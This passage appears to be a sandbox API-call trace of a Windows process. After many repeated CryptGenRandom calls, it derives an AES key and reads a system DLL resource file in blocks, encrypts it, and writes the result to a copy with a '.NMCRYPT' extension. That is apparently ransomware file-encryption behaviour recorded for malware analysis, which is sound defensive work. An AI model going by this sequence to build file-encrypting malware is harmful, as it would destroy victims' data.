CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.694] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.695] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.696] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.697] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.698] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.698] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0153.698] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.698] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad278) returned 1 [0153.698] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.698] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.698] wcslen (_String="\\\\?\\") returned 0x4 [0153.698] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2b8) returned 1 [0153.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.699] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0153.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.700] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.700] GetLastError () returned 0x0 [0153.700] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.469] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.469] GetLastError () returned 0x0 [0154.469] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.470] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.470] GetLastError () returned 0x0 [0154.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, 